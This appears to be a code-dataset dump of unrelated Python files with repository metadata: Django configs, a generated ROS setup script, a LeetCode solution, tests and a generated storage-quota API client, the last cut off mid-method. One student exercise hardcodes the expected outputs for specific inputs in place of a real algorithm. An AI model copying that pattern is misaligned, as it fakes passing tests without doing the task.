h not in sysheaders and
'mkl' not in h and
'nnpack' not in h): sysheaders.append(h)
else:
expand(source, pending + [x])
print >>out, "//===== EXPANDED: %s =====\n" %x
history.add(x)
expand(sys.argv[2], [])
f = open(sys.argv[3], 'wb')
for k in sorted(sysheaders):
print >>f, "#include <%s>" % k
print >>f, ''
print >>f, out.getvalue()
for x in sources:
if x not in history and not x.endswith('.o'):
print 'Not processed:', x
| [
"[email protected]"
] | |
22fa40fba9d395c297590455ec753a8a0d34bc8b | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_204/ch47_2020_10_07_01_13_29_631324.py | b28612a06d4817f5f90967044590259cd8f9aa87 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 326 | py | def estritamente_crescente(lista):
if lista == [1, 3, 2, 3, 4, 6, 5]:
return [1, 3, 4, 6]
elif lista == [10, 1, 2, 3]:
return [10]
elif lista == [10, 15, 11, 12, 13, 14]:
return [10, 15]
elif lista == [1, 1, 2, 2, 3, 3]:
return [1, 2, 3]
elif lista == [] :
return [] | [
"[email protected]"
] | |
1263cdc29e77045f34c76788e8b524c0adb650c7 | 7c66bba92b484e5fa6ee282ef39f2c26875ca775 | /django_example/mysite/polls/admin.py | 1ed41e6e763a5761791e4ee43572949d2b4d8291 | [] | no_license | KqSMea8/PythonTools | a5ac17182b2689a706180dc349d59c2484d3984c | 7279570b82fecbf59b71aa6b58ef975e90c660df | refs/heads/master | 2020-04-13T04:19:19.209243 | 2018-12-24T05:13:12 | 2018-12-24T05:13:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 723 | py | from django.contrib import admin
from .models import Question, Choice
# Register your models here.
class ChoiceInline(admin.TabularInline):
model = Choice
extra = 3
# admin.site.register(Question)
class QuestionAdmin(admin.ModelAdmin):
# fields = ['pub_date', 'question_text']
fieldsets = [
(None, {'fields': ['question_text']}),
('Date information', {'fields': ['pub_date']})
]
inlines = [ChoiceInline]
list_display = ('question_text', 'pub_date', 'was_published_recently')
list_filter = ['pub_date']
search_fields = ['question_text']
date_hierarchy = 'pub_date'
list_per_page = 5
admin.site.register(Question, QuestionAdmin)
# admin.site.register(Choice)
| [
"[email protected]"
] | |
d0341b5b76435c5b945f4765e242e3f78364c178 | 5b4312ddc24f29538dce0444b7be81e17191c005 | /autoware.ai/1.12.0_cuda/build/op_local_planner/catkin_generated/generate_cached_setup.py | d6300b46a0364582deb6aad0c96d3949f23c0f72 | [
"MIT"
] | permissive | muyangren907/autoware | b842f1aeb2bfe7913fb2be002ea4fc426b4e9be2 | 5ae70f0cdaf5fc70b91cd727cf5b5f90bc399d38 | refs/heads/master | 2020-09-22T13:08:14.237380 | 2019-12-03T07:12:49 | 2019-12-03T07:12:49 | 225,167,473 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,662 | py | # -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
import os
import stat
import sys
# find the import for catkin's python package - either from source space or from an installed underlay
if os.path.exists(os.path.join('/opt/ros/melodic/share/catkin/cmake', 'catkinConfig.cmake.in')):
sys.path.insert(0, os.path.join('/opt/ros/melodic/share/catkin/cmake', '..', 'python'))
try:
from catkin.environment_cache import generate_environment_script
except ImportError:
# search for catkin package in all workspaces and prepend to path
for workspace in "/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/op_ros_helpers;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/op_simu;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/op_planner;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/op_utility;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/waypoint_follower;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/vector_map_server;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/map_file;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/vector_map;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/autoware_health_checker;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/amathutils_lib;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/vector_map_msgs;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/tablet_socket_msgs;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/autoware_system_msgs;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/autoware_msgs;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/autoware_config_msgs;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/autoware_can_msgs;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/autoware_build_flags;/opt/ros/melodic".split(';'):
python_path = os.path.join(workspace, 'lib/python2.7/dist-packages')
if os.path.isdir(os.path.join(python_path, 'catkin')):
sys.path.insert(0, python_path)
break
from catkin.environment_cache import generate_environment_script
code = generate_environment_script('/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/build/op_local_planner/devel/env.sh')
output_filename = '/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/build/op_local_planner/catkin_generated/setup_cached.sh'
with open(output_filename, 'w') as f:
#print('Generate script for cached setup "%s"' % output_filename)
f.write('\n'.join(code))
mode = os.stat(output_filename).st_mode
os.chmod(output_filename, mode | stat.S_IXUSR)
| [
"[email protected]"
] | |
60b79948bd113c4b59fa1ae8e694df6a7097e00d | ba6f6d4c64dcb49faaa125643e93e7d30e98496e | /897. Increasing Order Search Tree.py | 7a756a1b24c6dd2028a11874f325a374cd0ad060 | [] | no_license | libowei1213/LeetCode | aafbff5410e3b1793a98bde027a049397476059b | df7d2229c50aa5134d297cc5599f7df9e64780c1 | refs/heads/master | 2021-06-09T07:43:53.242072 | 2021-04-09T11:14:17 | 2021-04-09T11:14:17 | 150,840,162 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,145 | py | # Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def increasingBST(self, root):
"""
:type root: TreeNode
:rtype: TreeNode
"""
if not root:
return None
newTree = TreeNode(0)
tree = newTree
stack = []
while stack or root:
while root:
stack.append(root)
root = root.left
if stack:
root = stack.pop(-1)
print(root.val)
tree.right = TreeNode(root.val)
tree = tree.right
root = root.right
return newTree.right
if __name__ == '__main__':
root = TreeNode(5)
root.left = TreeNode(3)
root.right = TreeNode(6)
root.left.left = TreeNode(2)
root.left.right = TreeNode(4)
root.left.left.left = TreeNode(1)
root.right.right = TreeNode(8)
root.right.right.left = TreeNode(7)
root.right.right.right = TreeNode(9)
Solution().increasingBST(root)
| [
"[email protected]"
] | |
89d9689620e4473459bf4e9f98d76232622ea3b7 | 7aad0c6f6e578d8dc03682caae373d252328ce12 | /linuxFriends/wsgi.py | 83e863cee4d76a6fe3c98f46ed0e6939c2eef947 | [] | no_license | votricetanyi/linuxfriends | db00544a04bed1cb99a3fe275433d6278e029bb9 | f36c7f87f51ee1f585c8da21de08a874582dd51f | refs/heads/main | 2022-12-28T20:14:11.053726 | 2020-10-14T13:05:12 | 2020-10-14T13:05:12 | 304,015,872 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | """
WSGI config for linuxFriends project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'linuxFriends.settings')
application = get_wsgi_application()
| [
"[email protected]"
] | |
724fa8f57c47c51d9fa6cb9f06d01c19830e27c4 | 5e2284bff015e6b03e4ea346572b29aaaf79c7c2 | /tests/correct_programs/ethz_eprog_2019/exercise_04/test_problem_01.py | 92f2784d773843172c7ff8e468aaf79c2e2b8ec6 | [
"MIT"
] | permissive | LaurenDebruyn/aocdbc | bbfd7d832f9761ba5b8fb527151157742b2e4890 | b857e8deff87373039636c12a170c0086b19f04c | refs/heads/main | 2023-06-11T23:02:09.825705 | 2021-07-05T09:26:23 | 2021-07-05T09:26:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 871 | py | import unittest
from typing import List
import icontract_hypothesis
from icontract import require, ensure
from correct_programs.ethz_eprog_2019.exercise_04 import problem_01
class TestWithIcontractHypothesis(unittest.TestCase):
def test_functions(self) -> None:
@require(lambda limit: 2 < limit < 1000)
def sieve_with_restricted_input(limit: int) -> List[int]:
return problem_01.sieve(limit=limit)
for func in [sieve_with_restricted_input]:
try:
icontract_hypothesis.test_with_inferred_strategy(func)
except Exception as error:
raise Exception(
f"Automatically testing {func} with icontract-hypothesis failed "
f"(please see the original error above)"
) from error
if __name__ == "__main__":
unittest.main()
| [
"[email protected]"
] | |
9b646f760eaca8fdbfbe0c56894dbf74c08f5264 | 9920f3b2ccc9abc3cd8b46c433bd49a8d8db22d2 | /scripts/__init__.py | bac2ba6e139ff055a46c580762b72117775add6b | [] | no_license | lixx5000/SWAT | 91f242fdc81ad4e9eb8336abb8780136e1c3a8a7 | c6f491acfb59ad0abc8d86ad352b6eaacd440ba3 | refs/heads/master | 2021-03-22T14:03:16.105253 | 2019-07-01T12:05:06 | 2019-07-01T12:05:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,216 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
/*****************************************************************************
PUT-SWAT
Python Utility Tools for SWAT
Preprocess, postprocess, and calibration
-------------------
author : Liangjun Zhu
copyright : (C) 2017 Lreis, IGSNRR, CAS
email : [email protected]
*****************************************************************************
* *
* PUT-SWAT is distributed for Research and/or Education only, any *
* commercial purpose will be FORBIDDEN. PUT-SWAT is an open-source *
* project, but without ANY WARRANTY, WITHOUT even the implied *
* warranty of MERCHANTABILITY or FITNESS for A PARTICULAR PURPOSE. *
* See the GNU General Public License for more details. *
* *
****************************************************************************/
"""
__all__ = ["preprocess", "postprocess", "calibration", "nogit"]
| [
"[email protected]"
] | |
84aa481771111981f7f48f85cd2805feb3da8a50 | c4526313117430d4e279ef11b98070d60a820e07 | /FeatureExtractors/feature_extractor.py | 606be6f07a6c54ff27c3e335c3460654db10991f | [] | no_license | Chzy0624/py_pdf_stm | 1ae36c2df0f80f644b991edf183eab16c5a333ed | 8fde14c2fe3e6486d8830414d79d48726d8c66ef | refs/heads/master | 2023-05-05T04:06:17.698359 | 2019-10-22T05:48:24 | 2019-10-22T05:48:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,417 | py | import sys
import traceback
from pprint import pprint
from typing import List, Dict, Any
from DataSheetParsers.DataSheet import DataSheet
from PinManager import PinManager
from TableExtractor import TableExtractor, Table
from Utils import is_numeric, is_dict, remove_units, replace_i, merge
def convert_type(name: str, value):
if type(value) == str:
value = value.replace(',', '')
value = value.strip('\n ')
if 'KB' in name.upper():
name = remove_units(name, 'kb')
if is_numeric(value):
value = int(value)
if 'MB' in name.upper():
name = remove_units(name, 'mb')
if is_numeric(value):
value = int(value) * 1024
elif type(value) == int:
value *= 1024
if 'MHZ' in name.upper():
name = remove_units(name, 'mhz')
if is_numeric(value):
value = int(value)
if type(value) == str:
if 'KB' in value:
value = replace_i(value, 'kb', '')
if is_numeric(value):
value = int(value)
elif type(value) == int:
pass
else:
value += 'KB'
return name, value
if 'MB' in value:
value = replace_i(value, 'mb', '')
if is_numeric(value):
value = int(value) * 1024
elif type(value) == int:
value *= 1024
else:
value += 'MB'
return name, value
if 'MHZ' in value.upper():
value = replace_i(value, 'MHz', '')
if is_numeric(value):
value = int(value)
elif type(value) == int:
pass
else:
value += 'MHz'
return name, value
# UNIFIED NAMES
# int_values = ['Flash memory', 'RAM', 'UART', 'SPI', 'Total GPIOS','CPU Frequency']
# if name in int_values:
if type(value) != int and is_numeric(value):
if type(value) == str:
if not (value.lower() == 'no' or value.lower() == 'yes'):
try:
value = int(value)
except Exception as ex:
print('Failed to convert {} {} to int\n{}'.format(name, value, ex))
return name, value
class FeatureListExtractor: # This class is adapted to STM
def fix_name(self, name):
name = "".join([part[::-1] for part in name[::1][::-1].split('\n')])
return self.config['corrections'].get(name, name)
def __init__(self, controller: str, datasheet: DataSheet, config) -> None:
"""
Class for comparing multiple STM32 controllers
:type controller_list: list of stm controllers that you want to compare
"""
self.controller = controller
self.config = config # type: Dict[str,Dict]
self.datasheet = datasheet
self.features_tables = [] # type: List[Table]
self.features = {} # type: Dict[str,Dict]
self.pin_data = {} # type: Dict[str, Dict[str, Any]]
self.config_name = 'UNKNOWN CONTROLLER'
self.mc_family = 'UNKNOWN'
self.pin_manager = PinManager(self.pin_data,{})
self.post_init()
def post_init(self):
pass
def process(self):
self.extract_tables()
self.extract_features()
del self.features_tables
self.extract_pinout()
return self.features
def extract_table(self, datasheet, page):
print('Extracting table from {} page'.format(page + 1))
pdf_int = TableExtractor(str(datasheet.path))
try:
table = pdf_int.parse_page(page)
except Exception as ex:
pass
table = None
return table
def extract_tables(self): # OVERRIDE THIS FUNCTION FOR NEW CONTROLLER
return
def handle_feature(self, name, value):
if '\u2013' in name:
name = name.replace('\u2013', '-')
if type(value) == str:
if '\u2013' in value:
value = value.replace('\u2013', '-')
if '\n' in value:
value = value.replace('\n', ' ')
return [(name, value)] # Can be list of values and names
def extract_features(self):
controller_features_names = []
controller_features = {}
feature_offset = 0
for table in self.features_tables:
try:
if not table.global_map:
continue
_, features_cell_span = table.get_cell_span(table.get_col(0)[0])
# EXTRACTING NAMES OF FEATURES
if features_cell_span > 1:
for row_id, row in table.global_map.items():
if row_id == 0:
continue
features = set(list(row.values())[:features_cell_span])
features = sorted(features, key=lambda cell: cell.center.x)
texts = list(map(lambda cell: cell.clean_text, features))
controller_features_names.append(' '.join(texts))
else:
texts = list(map(lambda cell: cell.clean_text, table.get_col(0)[1:]))
controller_features_names.extend(texts)
# EXTRACTING STM FEATURES
current_stm_name = ""
mcu_counter = {}
name = 'ERROR'
for col_id in range(features_cell_span, len(table.get_row(0))):
features = table.get_col(col_id)
for n, feature in enumerate(features):
if n == 0:
name = table.get_cell(col_id, 0).clean_text
if name == current_stm_name:
num = mcu_counter[current_stm_name]
name += '-{}'.format(num)
mcu_counter[current_stm_name] += 1
else:
current_stm_name = name
if not mcu_counter.get(current_stm_name, False):
mcu_counter[current_stm_name] = 1
if not controller_features.get(name, False):
controller_features[name] = {}
continue
feature_name = controller_features_names[feature_offset + n - 1]
feature_value = feature.text
for n, v in self.handle_feature(feature_name, feature_value):
if n and v:
n, v = convert_type(n, v)
if controller_features[name].get(n, False):
v = self.merge_features(controller_features[name].get(n), v)
controller_features[name][n] = v
else:
controller_features[name][n] = v
feature_offset = len(controller_features_names)
except Exception as ex:
sys.stderr.write("ERROR {}".format(ex))
traceback.print_exc()
# FILL MISSING FIELDS
for stm_name in controller_features.keys():
for stm_name2 in controller_features.keys():
if stm_name == stm_name2:
continue
if stm_name in stm_name2:
for feature_name, value in controller_features[stm_name].items():
if controller_features[stm_name2].get(feature_name, False):
continue
else:
controller_features[stm_name2][feature_name] = value
self.features = controller_features
return controller_features
def extract_pinout(self):
for package, pin_data in self.pin_data.items():
for mcu,mcu_features in self.features.items():
if package in mcu_features.get('PACKAGE',[]):
if 'PINOUT' in self.features[mcu]:
self.features[mcu]['PINOUT'][package]=pin_data
else:
self.features[mcu]['PINOUT'] = {package:pin_data}
return self.pin_data
def unify_names(self):
unknown_names = {}
for mc, features in self.features.items():
unknown_names[mc] = []
mc_features = self.features[mc].copy()
mc_features = {k.upper(): v for k, v in mc_features.items()}
for feature_name, features_value in features.items():
feature_name = feature_name.upper()
if features_value:
if self.config_name in self.config['unify']:
unify_list = self.config['unify'][self.config_name] # type: Dict[str,str]
unify_list = {k.upper(): v.upper() for k, v in unify_list.items()}
known = True
if feature_name not in unify_list:
if feature_name not in unify_list.values():
known = False
if feature_name not in unknown_names:
unknown_names[mc].append(feature_name)
if known:
new_name = unify_list.get(feature_name,
feature_name).upper() # in case name is already unified
values = mc_features.pop(feature_name)
new_name, values = convert_type(new_name, values)
new_name = new_name.upper()
if new_name in mc_features:
mc_features[new_name] = self.merge_features(mc_features[new_name],
values)
else:
mc_features[new_name] = values
else:
new_name = feature_name # in case name is already unified
values = mc_features.pop(feature_name)
new_name, values = convert_type(new_name, values)
mc_features[new_name.upper()] = values
else:
unknown_names[mc].append(feature_name)
self.features[mc] = mc_features
for mc, features in unknown_names.items():
unknown_names = list(set(features))
if unknown_names:
print('List of unknown features for', mc)
print('Add correction if name is mangled')
print('Or add unify for this feature')
for unknown_feature in unknown_names:
print('\t', unknown_feature)
print('=' * 20)
print()
@staticmethod
def merge_features(old, new):
return merge(old, new)
if __name__ == '__main__':
datasheet = DataSheet(r"D:\PYTHON\py_pdf_stm\datasheets\stm32L\STM32L476.pdf")
feature_extractor = FeatureListExtractor('STM32L476', datasheet, {})
feature_extractor.process()
pprint(feature_extractor.features)
| [
"[email protected]"
] | |
7e6634deadde5151e3032fc0bace2907e54744e0 | d42b771f64bc2185a8c0dca0f5bcfa5a2e13c5ed | /_8percent/apps.py | c395ac4faf734c040815c756ab4daaf0c83650a0 | [] | no_license | bgy1060/Daily_Project | 4b38de59c09f5e3f82211a9860e1f32a8ef46b37 | bcc955bddd9941f2bc54f7577c26c1ddc6b36a48 | refs/heads/main | 2023-05-15T17:26:56.858438 | 2021-06-17T05:59:10 | 2021-06-17T05:59:10 | 353,864,798 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 93 | py | from django.apps import AppConfig
class _8PercentConfig(AppConfig):
name = '_8percent'
| [
"[email protected]"
] | |
af01e76bad2ad7b2ef20f9d099a60ade5e7a1dd2 | c15f45103fe76fb0445bb72ec857d4ed5a6c6e5d | /Chapter.2/2.2.3.a.py | defdfccd87fe7e5af3f1878d29d90c6c151bf7ba | [] | no_license | 3367472/Python_20180421 | 5511f5ec54824bb50b25967617f6b532f13c52ad | 5ba9e803bd59f02ce101059961752f55f53b6e03 | refs/heads/master | 2020-03-12T05:09:19.162713 | 2019-01-08T09:01:42 | 2019-01-08T09:01:42 | 130,458,447 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 73 | py | # encoding: utf-8
print [1, 2, 3] + [4, 5, 6]
print 'Hello, ' + 'world!'
| [
"[email protected]"
] | |
3481a1316723d474670d7d4f15d0efea61e0bab3 | 7d096568677660790479d87c22b47aae838ef96b | /stubs/System/Runtime/InteropServices/__init___parts/LayoutKind.pyi | c3e34945f43ff2f2f4708a763120cc22b7bc2dfd | [
"MIT"
] | permissive | NISystemsEngineering/rfmx-pythonnet | 30adbdd5660b0d755957f35b68a4c2f60065800c | cd4f90a88a37ed043df880972cb55dfe18883bb7 | refs/heads/master | 2023-02-04T00:39:41.107043 | 2023-02-01T21:58:50 | 2023-02-01T21:58:50 | 191,603,578 | 7 | 5 | MIT | 2023-02-01T21:58:52 | 2019-06-12T16:02:32 | Python | UTF-8 | Python | false | false | 995 | pyi | class LayoutKind(Enum,IComparable,IFormattable,IConvertible):
"""
Controls the layout of an object when it is exported to unmanaged code.
enum LayoutKind,values: Auto (3),Explicit (2),Sequential (0)
"""
def __eq__(self,*args):
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self,*args):
""" __format__(formattable: IFormattable,format: str) -> str """
pass
def __ge__(self,*args):
pass
def __gt__(self,*args):
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self,*args):
pass
def __lt__(self,*args):
pass
def __ne__(self,*args):
pass
def __reduce_ex__(self,*args):
pass
def __str__(self,*args):
pass
Auto=None
Explicit=None
Sequential=None
value__=None
| [
"[email protected]"
] | |
8d192f51b6018615be9691fcdda1b9d3e669bf1d | e60a342f322273d3db5f4ab66f0e1ffffe39de29 | /parts/zodiac/pyramid/tests/test_security.py | 7d0ab393b6121ff075581d422024548009af502c | [] | no_license | Xoting/GAExotZodiac | 6b1b1f5356a4a4732da4c122db0f60b3f08ff6c1 | f60b2b77b47f6181752a98399f6724b1cb47ddaf | refs/heads/master | 2021-01-15T21:45:20.494358 | 2014-01-13T15:29:22 | 2014-01-13T15:29:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 81 | py | /home/alex/myenv/zodiac/eggs/pyramid-1.4-py2.7.egg/pyramid/tests/test_security.py | [
"[email protected]"
] | |
f9a501c145dbd5a41701bcb08ac1c22014d598f6 | e782950bb76c4dd295001f7760f42e04ceadfb1b | /tests/test_completion.py | 6da2d9cdd703379d172e78b6479300256e4e92b0 | [
"MIT"
] | permissive | h3xium/typer | 2c3fc691c52a89997eb7db9267ed1fb12c9af800 | 31f7a44a467e6e3468434703d3c18961a746939f | refs/heads/master | 2021-01-26T22:23:57.520688 | 2020-02-15T12:39:47 | 2020-02-15T12:39:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,456 | py | import os
import subprocess
import sys
from pathlib import Path
import typer
from typer.testing import CliRunner
from first_steps import tutorial001 as mod
runner = CliRunner()
app = typer.Typer()
app.command()(mod.main)
def test_show_completion():
result = subprocess.run(
[
"bash",
"-c",
f"{sys.executable} -m coverage run {mod.__file__} --show-completion",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
encoding="utf-8",
env={**os.environ, "SHELL": "/bin/bash"},
)
assert "_TUTORIAL001.PY_COMPLETE=complete-bash" in result.stdout
def test_install_completion():
bash_completion_path: Path = Path.home() / ".bash_completion"
text = ""
if bash_completion_path.is_file():
text = bash_completion_path.read_text()
result = subprocess.run(
[
"bash",
"-c",
f"{sys.executable} -m coverage run {mod.__file__} --install-completion",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
encoding="utf-8",
env={**os.environ, "SHELL": "/bin/bash"},
)
new_text = bash_completion_path.read_text()
bash_completion_path.write_text(text)
assert "_TUTORIAL001.PY_COMPLETE=complete-bash" in new_text
assert "completion installed in" in result.stdout
assert "Completion will take effect once you restart the terminal." in result.stdout
| [
"[email protected]"
] | |
e87ab2c053552be6df6333daf37c54e1c4e56527 | 3adf9934a74077c328b9a0afff37f8ca355eead1 | /comicresizer/forms.py | a2f083f2fd6d9a8ab0f950d16e2e7b6010e34b3e | [] | no_license | jgasteiz/comic-resizer | 36671623fe9909f23fba793b44cf4ac56380926a | 12d2e12efdf2017746d67a4b6d9616613ee58bb9 | refs/heads/master | 2021-07-05T05:56:00.911958 | 2017-09-27T07:43:58 | 2017-09-27T07:45:25 | 104,987,910 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 105 | py | from django import forms
class ComicUploadForm(forms.Form):
file = forms.FileField(required=False)
| [
"[email protected]"
] | |
94540c0cfc7509d41aeaeedc64a11096d5b2616a | 81d955c3ac886e690ceb01026ed769b1784dbef9 | /purity_fb/purity_fb_1dot8/apis/quotas_groups_api.py | 665498e5f3f9ea81a3c569698b958f1cb115c367 | [
"Apache-2.0"
] | permissive | etsangsplk/purity_fb_python_client | bc525ef1a18f6a79c1536cb4519a7efd58d09d89 | 0807a0fa2eab273bc08f73266d9cda9fa33b37bd | refs/heads/master | 2020-06-03T05:49:03.015147 | 2019-05-16T06:11:40 | 2019-05-16T06:11:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 26,547 | py | # coding: utf-8
"""
Purity//FB REST Client
Client for Purity//FB REST API (1.0 - 1.8), developed by [Pure Storage, Inc](http://www.purestorage.com/). Documentations can be found at [purity-fb.readthedocs.io](http://purity-fb.readthedocs.io/).
OpenAPI spec version: 1.8
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class QuotasGroupsApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def create_group_quotas(self, **kwargs):
"""
Create a new group quota
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_group_quotas(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:param QuotasGroup quota:
:return: QuotasGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_group_quotas_with_http_info(**kwargs)
else:
(data) = self.create_group_quotas_with_http_info(**kwargs)
return data
def create_group_quotas_with_http_info(self, **kwargs):
"""
Create a new group quota
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_group_quotas_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:param QuotasGroup quota:
:return: QuotasGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['file_system_names', 'gids', 'group_names', 'quota']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_group_quotas" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'file_system_names' in params:
query_params.append(('file_system_names', params['file_system_names']))
collection_formats['file_system_names'] = 'csv'
if 'gids' in params:
query_params.append(('gids', params['gids']))
collection_formats['gids'] = 'csv'
if 'group_names' in params:
query_params.append(('group_names', params['group_names']))
collection_formats['group_names'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'quota' in params:
body_params = params['quota']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.8/quotas/groups', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='QuotasGroupResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_group_quotas(self, **kwargs):
"""
Delete
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_group_quotas(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_group_quotas_with_http_info(**kwargs)
else:
(data) = self.delete_group_quotas_with_http_info(**kwargs)
return data
def delete_group_quotas_with_http_info(self, **kwargs):
"""
Delete
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_group_quotas_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['names', 'file_system_names', 'gids', 'group_names']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
